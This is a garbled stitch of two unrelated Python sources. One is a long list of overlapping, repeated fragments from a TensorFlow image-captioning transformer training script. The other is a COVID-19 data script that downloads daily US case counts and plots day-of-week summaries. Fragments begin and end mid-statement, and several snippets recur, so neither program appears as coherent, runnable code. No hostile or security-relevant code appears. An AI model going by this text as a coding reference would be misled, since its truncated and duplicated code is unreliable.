dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask) train_loss =", "paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens", "Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64", "64 # can reduce or increase depending on GPU capacity # Shuffle and", "GPU ## ## this is important for running CuDNN on GPU ## tf.keras.backend.clear_session()", "tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions,", "important for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for easy reset", "epsilon=1e-9) # Visualize the schedule: uncomment to plot # import matplotlib.pyplot as plt", "Image import pickle import re import os import time import datetime from tqdm", "def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train))", "# These parameters control the size and complexity of the model # BERT", "# Encoder padding mask - This should just be 1's # input shape", "= tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower()))", "# Used in the 1st attention block in the decoder. # It is", "in the input received by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask =", "extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset", "Please comment out if not training on GPU ## ## this is important", "{} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1", "Perform one step of raining on one batch in an epoch @tf.function def", "of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3]", "range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption", "8 # BERT Base Model # num_layers = 12 # d_model = 768", "7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning", "(batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0:", "block in the decoder. # It is used to pad and mask future", "ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2", "just be 1's # input shape should be (batch_size, 49, 2048) inp_seq =", "gpus: # Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True)", "way if data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We", "by # the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask,", "annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file", "create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask,", "for easy reset of notebook state # chck if GPU can be seen", "caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100", "# This is a quick way if data fits in memory lens =", "# random_state=42) img_train, cap_train = img_names, captions # Load the numpy file with", "with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap", "print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### # These parameters", "# It is used to pad and mask future tokens in the input", "GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow to only use", "- This should just be 1's # input shape should be (batch_size, 49,", "train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp,", "dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch in an epoch", "# inp -> images, tar -> caption for (batch, (inp, tar)) in enumerate(dataset):", "(%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch +", "inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x = x", "creating masks def create_masks(inp, tar): # Encoder padding mask - This should just", "length of captions after tokenization # tfds demonstrated in earlier chapters # This", "# Visible devices must be set before GPUs have been initialized print(e) ###############################################", "combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager", "step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model)", "d_model * 4 # as per BERT paper # num_heads = 12 target_vocab_size", "Setup ######################### # Learning Rate Schedule, as per `Attention is All You Need'", "# for storing prefixes annot = prefix + 'data.csv' inputs = pd.read_csv(annot, header=None,", "tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real,", "loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_", "need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, #", "import pickle import re import os import time import datetime from tqdm import", "feedforward size # Small Model num_layers = 4 d_model = 128 dff =", "header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer =", "return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98,", "arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the", "dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the decoder.", "outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block in the", "# plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object =", "= datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts,", "print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### # These parameters control", "- len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\")", "train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for (batch, (inp, tar))", "length of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max", "# BERT Base Model # num_layers = 12 # d_model = 768 #", "2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask =", "######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist()", "######################### # Helper function for creating masks def create_masks(inp, tar): # Encoder padding", "glob from PIL import Image import pickle import re import os import time", "= d_model * 4 # as per BERT paper # num_heads = 12", "######################### # Learning Rate Schedule, as per `Attention is All You Need' paper", "tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='train_accuracy') ######################### # Helper function for creating masks def", "see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff, target_vocab_size,", "import re import os import time import datetime from tqdm import tqdm #", "start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x", "dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### # Loss and Metrics loss_object", "Use map to load the numpy files in parallel dataset = dataset.map(lambda item1,", "Visible devices must be set before GPUs have been initialized print(e) ############################################### #########################", "captions without truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens start", "= 12 # d_model = 768 # dff = d_model * 4 #", "have been initialized print(e) ############################################### ######################### # Load Data file mapping captions to", "# d_model = 768 # dff = d_model * 4 # as per", "which cover 99% of the captions without truncation max_len = int(lens.quantile(0.99) + 1)", "checkpoint_path, max_to_keep=5) # if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint:", "+ \"features/\" # for storing prefixes annot = prefix + 'data.csv' inputs =", "target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1 EPOCHS =", "cover 99% of the captions without truncation max_len = int(lens.quantile(0.99) + 1) #", "`Attention is All You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule,", "pickle import re import os import time import datetime from tqdm import tqdm", "d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps =", "used to pad and mask future tokens in the input received by #", "uncomment to plot # import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) #", "= tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy files in parallel", "load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) #", "from sklearn.model_selection import train_test_split import json from glob import glob from PIL import", "{:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch +", "{}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(),", "1st attention block in the decoder. # It is used to pad and", "os import time import datetime from tqdm import tqdm # our visual transformer", "feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train,", "RuntimeError as e: # Visible devices must be set before GPUs have been", "= 1000 BATCH_SIZE = 64 # can reduce or increase depending on GPU", "num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset", "# all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the", "class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model =", "use_pe=False ) ######################### # Training Setup ######################### # Learning Rate Schedule, as per", "as e: # Visible devices must be set before GPUs have been initialized", "x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x: tokenize_pad(x)) print(\"Captions tokenized and padded/truncated\") # now to", "set this as the max length of captions # which cover 99% of", "capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform", "prefix + \"features/\" # for storing prefixes annot = prefix + 'data.csv' inputs", "is used to pad and mask future tokens in the input received by", "= loss_function(tar_real, predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) #", "the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] +", "Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top", "+ 1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result()))", "without truncation max_len = int(lens.quantile(0.99) + 1) # for special tokens start =", "############### ## Please comment out if not training on GPU ## ## this", "restored!!') ######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE = 1000", "import load_img import tensorflow_datasets as tfds import numpy as np import pandas as", "prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len:", "dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager =", "# BERT (base) uses 12 layers, 768 as embedding dim, 12 attention heads", "arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate", "should just be 1's # input shape should be (batch_size, 49, 2048) inp_seq", "* 4 # as per BERT paper # num_heads = 12 target_vocab_size =", ":-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape()", "epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar", "1, ckpt_save_path)) print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time", "= inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation examples so" ]
[ "# # EXPORTS # =========================================================================== # # Define the module's API -- the", "df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') # Set", "y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "for reuse. return df # -- Data Processing: Transform -- # def transform_data(df:", "Filesytem -- # ROOT_DIR = os.path.join(os.getcwd(), '..') DATA_DIR = '../data' RESULTS_DIR = '../results'", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png')", "- The main module for processing data and creating visual summaries for this", "preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png') def visualize_data(df: pd.DataFrame): set_figure_defaults() plot_series(df.sort_values('date')) summarize_by_dow(df) summarize_by_dow_percent(df) summarize_by_dow_zscore(df)", "Add date-derived columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week']", "zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta'] = lag_delta(df.posIncrease, 1)", "plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df,", "Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG", "16, 2020' # =========================================================================== # # EXPORTS # =========================================================================== # # Define the", "Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug", "type(df).__name__) print(df.head(5)) def zScore(x, mean, std): return (x - mean) / std #", "reuse. return df # -- Data Processing: Load -- # # -- Utilities", "Program -- # # If this module is in the main module, call", "# # If this module is in the main module, call the main()", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df,", "columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', },", "pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data frame.", "-- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'),", "row['day1LagDelta'] < 0 and row['day1LeadDelta'] > 0: return True else: return False def", "sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA |", "df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease':", "] # =========================================================================== # # IMPORTS # =========================================================================== # # -- Python Standard", "Add group-summarization columns. df_weekly = df.groupby('week', as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease':", "summarize_by_dow_percent(df) summarize_by_dow_zscore(df) summarize_maxima(df[df['localMaximum'].eq(True)]) # Debug data frame. DEBUG and preview(df, visualize_data.__name__) # Return", "df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease,", "plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', )", "processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df,", "# -- Main Program -- # # If this module is in the", "# -- Python Standard Library -- # import os # -- 3rd Party", "frame. DEBUG and preview(df, add_columns.__name__) # Return data frame for reuse. return df", "visualize_data(df) # =========================================================================== # # MAIN EXECUTION # =========================================================================== # # -- Main", "-- Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = {", "# functions, etc.) -- when performing a \"wild import\" (`from field import *`).", "Week') ax.set_ylabel('Percent of Weekly Count of Cases') # Debug data frame. DEBUG and", "If this module is in the main module, call the main() function. if", "True else: return False def local_min(row): if row['day1LagDelta'] < 0 and row['day1LeadDelta'] >", "extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df,", "= 'https://covidtracking.com/api/v1/us/daily.csv' # =========================================================================== # # FUNCTIONS # =========================================================================== # # -- Data", "preview(df: pd.DataFrame, func_name: str): print(f'INSIDE {func_name}(): type =', type(df).__name__) print(df.head(5)) def zScore(x, mean,", "# Return data frame for reuse. return df # -- Data Processing: Transform", "MAIN EXECUTION # =========================================================================== # # -- Main Program -- # # If", "the list of exportable objects (classes, # functions, etc.) -- when performing a", "mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 |", "import\" (`from field import *`). __all__ = [ 'DEBUG', ] # =========================================================================== #", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19", "pd.DataFrame: # Download source data as CSV from an API. df = pd.read_csv(SOURCE_URL)", "return df def rename_columns(df: pd.DataFrame) -> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) #", "as_index=False)['posIncrease'].agg( { 'weeklyPosIncrease': 'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge(", "data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily", "-- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS = { 'positive': 'pos',", "= pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] =", "0: return True else: return False def local_min(row): if row['day1LagDelta'] < 0 and", "'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', ] # -- Debugging -- # DEBUG", "-- Main Program -- # def main(): df = extract_data() df = transform_data(df)", "Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='posIncrease', order=DOW, )", "df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION", "the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and", "summaries for this study. \"\"\" # =========================================================================== # # METADATA # =========================================================================== #", "-- # import os # -- 3rd Party -- # import matplotlib.dates as", "of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG", "ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug data frame. DEBUG and", "Add local extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) #", "# -- Utilities -- # def lag_delta(series, period): return series - series.shift(period) def", "a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data", "# CONSTANTS # =========================================================================== # # -- Data -- # DAILY = 'daily'", "df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of", "lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period) - series", "f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data frame. DEBUG and preview(df, extract_data.__name__) # Return", "| USA | Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly", "python3 \"\"\" main.py - The main module for processing data and creating visual", "pd.DataFrame: df = rename_columns(df) df = add_columns(df) # Debug data frame. DEBUG and", "Daily New Positive Cases') ax.set_xlabel('Date') ax.set_ylabel('Count of Cases') ax.xaxis_date() # plt.show() # Debug", "['Robert (Bob) <NAME>'] __created_date__ = 'Sep 16, 2020' __modified_date__ = 'Sep 16, 2020'", "y='pctWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive", "0 and row['day1LeadDelta'] > 0: return True else: return False def percent(num, denom):", "mean) / std # -- Main Program -- # def main(): df =", ") sns.lineplot( data=df, x='date', y='posIncrease', marker='o', ) ax.set_title('COVID-19 | Year 2020 | USA", "as pd import seaborn as sns # =========================================================================== # # CONSTANTS # ===========================================================================", "# Use seaborn style defaults. Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize':", "columns. df['date'] = df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week", "= df.index.date df['year'] = df.index.year df['month'] = df.index.month df['week'] = df.index.week df['dow'] =", "'std', }, ) df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] =", "fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow',", "Extract -- # def extract_data() -> pd.DataFrame: # Download source data as CSV", "# def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return series.shift(-period)", "set_figure_defaults(): # Use seaborn style defaults. Set the default figure size. sns.set( style='darkgrid',", "= plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter( mpl_dates.DateFormatter('%m-%d-%Y'), ) sns.lineplot( data=df, x='date', y='posIncrease', marker='o',", "# Set the date as the DataFrame's index. df = df.set_index('date') # Add", "df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, add_columns.__name__) #", "an API. df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted data.", "main(): df = extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN", "of Cases') # Debug data frame. DEBUG and preview(df, summarize_maxima.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_maxima.png')", "rename_columns.__name__) # Return data frame for reuse. return df # -- Data Processing:", "Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the processed data. df.to_csv(", "import seaborn as sns # =========================================================================== # # CONSTANTS # =========================================================================== # #", "plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) sns.boxplot( data=df,", "size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df: pd.DataFrame): fig = plt.figure()", "-> pd.DataFrame: # Rename columns. df.rename(columns=COLUMNS, inplace=True) # Save a copy of the", "-- Data Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax =", "Processing: Extract -- # def extract_data() -> pd.DataFrame: # Download source data as", "extrema columns. df['localMaximum'] = df.apply(local_max, axis=1) df['localMinimum'] = df.apply(local_min, axis=1) # Save a", "Save a copy of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug", "'sum', 'meanWeeklyPosIncrease': 'mean', 'stdWeeklyPosIncrease': 'std', }, ) df = pd.merge( df, df_weekly, how='left',", ") ax.set_title('COVID-19 | Year 2020 | USA | Daily New Positive Cases') ax.set_xlabel('Day", "Daily New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Percent of Weekly Count of Cases')", "Set the default figure size. sns.set( style='darkgrid', rc={'figure.figsize': (16, 9)}, ) def summarize_by_dow(df:", "and preview(df, visualize_data.__name__) # Return data frame for reuse. return df # --", "preview(df, visualize_data.__name__) # Return data frame for reuse. return df # -- Data", "return df def add_columns(df: pd.DataFrame): # Format date. df.date = pd.to_datetime(df.date, format='%Y%m%d') #", "summarize_by_dow_zscore.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_zscore.png') def summarize_maxima(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111)", "Download source data as CSV from an API. df = pd.read_csv(SOURCE_URL) # Save", "ax.set_ylabel('Z-Score of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df,", "preview(df, summarize_by_dow_percent.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow_percent.png') def summarize_by_dow_zscore(df: pd.DataFrame): fig = plt.figure() ax =", "add_columns(df) # Debug data frame. DEBUG and preview(df, transform_data.__name__) # Return data frame", "exportable objects (classes, # functions, etc.) -- when performing a \"wild import\" (`from", "fig = plt.figure() ax = plt.subplot(111) sns.countplot( data=df, x='dow', order=DOW, ) ax.set_title('COVID-19 |", "extract_data() df = transform_data(df) visualize_data(df) # =========================================================================== # # MAIN EXECUTION # ===========================================================================", "# -- Data -- # DAILY = 'daily' WEEKLY = 'weekly' COLUMNS =", "= plt.figure() ax = plt.subplot(111) sns.boxplot( data=df, x='dow', y='zscoreWeeklyPosIncrease', order=DOW, ) ax.set_title('COVID-19 |", "'..') DATA_DIR = '../data' RESULTS_DIR = '../results' # -- URLs -- # SOURCE_URL", "return False def percent(num, denom): return 100 * num / denom def preview(df:", "'positiveIncrease': 'posIncrease', } DOW = [ 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday',", "df['localMinimum'] = df.apply(local_min, axis=1) # Save a copy of the processed data. df.to_csv(", "Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug", "plt.show() # Debug data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): #", "# # -- Main Program -- # # If this module is in", "# # METADATA # =========================================================================== # __author__ = 'Robert (Bob) <NAME>' __credits__ =", "df.weeklyPosIncrease) df['zscoreWeeklyPosIncrease'] = zScore( df.posIncrease, df.meanWeeklyPosIncrease, df.stdWeeklyPosIncrease, ) # Add delta columns. df['day1LagDelta']", "f'{DATA_DIR}/02_intermediate/{DAILY}_rename_columns.csv', index=True, ) # Debug data frame. DEBUG and preview(df, rename_columns.__name__) # Return", "row['day1LagDelta'] > 0 and row['day1LeadDelta'] < 0: return True else: return False def", "Processing: Load -- # # -- Utilities -- # def lag_delta(series, period): return", "= df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization columns. df_weekly", "of Weekly Count of Cases') # Debug data frame. DEBUG and preview(df, summarize_by_dow_percent.__name__)", "New Positive Cases') ax.set_xlabel('Day of Week') ax.set_ylabel('Z-Score of Weekly Count of Cases') #", "Processing: Transform -- # def transform_data(df: pd.DataFrame) -> pd.DataFrame: df = rename_columns(df) df", "-- # # If this module is in the main module, call the", "# =========================================================================== # # -- Data -- # DAILY = 'daily' WEEKLY =", "a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) # Debug data", "Debug data frame. DEBUG and preview(df, summarize_by_dow.__name__) # plt.show() fig.savefig(f'{RESULTS_DIR}/summarize_dow.png') def summarize_by_dow_percent(df: pd.DataFrame):", "0: return True else: return False def percent(num, denom): return 100 * num", "print(df.head(5)) def zScore(x, mean, std): return (x - mean) / std # --", "API. df = pd.read_csv(SOURCE_URL) # Save a copy of the extracted data. df.to_csv(", "df.index.month df['week'] = df.index.week df['dow'] = df.index.day_name() df['dowIndex'] = df.index.dayofweek # Add group-summarization", "is in the main module, call the main() function. if __name__ == '__main__':", "Analytics -- # def plot_series(df: pd.DataFrame): fig = plt.figure() ax = plt.subplot(111) ax.xaxis.set_major_formatter(", "-- # def lag_delta(series, period): return series - series.shift(period) def lead_delta(series, period): return", "Define the module's API -- the list of exportable objects (classes, # functions,", "# Save a copy of the extracted data. df.to_csv( f'{DATA_DIR}/01_raw/{DAILY}_extract_data.csv', index=False, ) #", "data frame. DEBUG and preview(df, plot_series.__name__) fig.savefig(f'{RESULTS_DIR}/plot_series.png') def set_figure_defaults(): # Use seaborn style", "}, ) df = pd.merge( df, df_weekly, how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease,", "of the processed data. df.to_csv( f'{DATA_DIR}/02_intermediate/{DAILY}_add_columns.csv', index=True, ) # Debug data frame. DEBUG", "frame. DEBUG and preview(df, visualize_data.__name__) # Return data frame for reuse. return df", "how='left', on='week', ) df['pctWeeklyPosIncrease'] = percent(df.posIncrease, df.weeklyPosIncrease) 